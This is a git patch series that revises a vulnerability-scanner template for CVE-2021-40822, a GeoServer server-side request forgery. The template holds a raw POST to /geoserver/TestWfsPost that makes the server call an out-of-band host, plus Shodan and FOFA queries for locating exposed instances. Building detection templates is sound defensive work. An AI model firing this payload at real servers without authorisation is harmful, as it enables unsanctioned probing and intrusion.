From 2cf1d043b7ce1b5b1edf88349627e014bd07dfdb Mon Sep 17 00:00:00 2001 From: aringo Date: Mon, 10 Jul 2023 13:01:34 -0500 Subject: [PATCH 1/4] Fixed CVE-2021-40822 --- http/cves/2021/CVE-2021-40822.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index 0888e11fad..d3714ad69a 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -27,7 +27,7 @@ http: - raw: - | POST /geoserver/TestWfsPost HTTP/1.1 - Host: {{Hostname}} + Host: {{interactsh-url}} Content-Type: application/x-www-form-urlencoded form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password= From 058e02cd68f6911f3c0ff60c7cd4809ec49cb963 Mon Sep 17 00:00:00 2001 From: Aaron Ringo <102995281+aringo-bf@users.noreply.github.com> Date: Mon, 10 Jul 2023 13:05:51 -0500 Subject: [PATCH 2/4] Update CVE-2021-40822.yaml --- http/cves/2021/CVE-2021-40822.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index d3714ad69a..657eb6a279 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -2,7 +2,7 @@ id: CVE-2021-40822 info: name: Geoserver - Server-Side Request Forgery - author: For3stCo1d + author: For3stCo1d, aringo-bf severity: high description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host. reference: From 87bc41c4182d7b7fbcec650cfc62396e39597423 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 11 Jul 2023 12:14:55 +0530 Subject: [PATCH 3/4] fix matcher --- http/cves/2021/CVE-2021-40822.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index 657eb6a279..b5795efd14 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -2,7 +2,7 @@ id: CVE-2021-40822 info: name: Geoserver - Server-Side Request Forgery - author: For3stCo1d, aringo-bf + author: For3stCo1d,aringo-bf severity: high description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host. reference: @@ -27,21 +27,22 @@ http: - raw: - | POST /geoserver/TestWfsPost HTTP/1.1 - Host: {{interactsh-url}} + Host: oast.pro Content-Type: application/x-www-form-urlencoded - form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password= + form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password= matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: body words: - - "http" + - "Interactsh Server" - type: word + part: header words: - - "" + - "text/html" - type: status status: From ed22f507dd72442a8f2e300ffb59aa785d7a2d99 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 12 Jul 2023 17:29:22 +0530 Subject: [PATCH 4/4] Update CVE-2021-40822.yaml --- http/cves/2021/CVE-2021-40822.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index b5795efd14..ca439dd319 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -19,15 +19,16 @@ info: epss-score: 0.65495 metadata: max-request: 1 - fofa-query: app="GeoServer" verified: true + shodan-query: title:"GeoServer" + fofa-query: app="GeoServer" tags: cve,cve2021,ssrf,geoserver http: - raw: - | POST /geoserver/TestWfsPost HTTP/1.1 - Host: oast.pro + Host: {{oast.pro}} Content-Type: application/x-www-form-urlencoded form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password= @@ -37,7 +38,7 @@ http: - type: word part: body words: - - "Interactsh Server" + - "Interactsh" - type: word part: header